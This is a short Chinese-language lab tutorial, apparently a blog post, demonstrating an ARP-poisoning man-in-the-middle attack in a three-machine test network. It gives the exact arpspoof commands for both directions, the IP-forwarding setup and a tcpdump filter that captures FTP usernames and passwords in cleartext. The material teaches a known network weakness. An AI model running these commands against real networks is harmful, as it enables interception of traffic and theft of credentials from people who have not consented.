配置环境:
kali(中间人):192.168.3.90
win7pro(PC机):192.168.3.91
win10(ftp服务):192.168.3.83
*三台主机相互PING通
实验原理:PC机访问本网络的一台FPTserver服务的主机,中间人kali进行arp投毒,获取PC机和FTPserver主机之间的回话记录,截获用户名和密码。
图片.pngstep1:中间人kali开启路由转发功能:
echo 1 > /proc/sys/net/ipv4/ip_forward
step2:进行ARP投毒
1:PC机要向FTPserver发送报文,kali欺骗PC机说自己是FTPserver;
指令:arpspoof -i eth0 -t 192.168.3.91 192.168.3.83
图片.png
2: 接下来开始欺骗FTP,同理,kali(中间人)进行欺骗,欺骗FTP说自己是PC机
指令:arpspoof -i eth0 -t 192.168.3.83 192.168.3.91
step3:
kali(中间人) 进行抓包模式
指令:tcpdump -i eth0 -nn -X tcp port 21
step4:
之前我们在win10上用(3CDaemon)搭建的FTP的用户名为admin 密码为123456
step5:
我们在win7pro上进行ftp命令,连接到win10(FTPserver)上,并输入之前搭建的FTP账户和密码
图片.png
step6:
查看刚刚我们用kali的抓包,可以准确的截获用户名和密码
图片.png
网友评论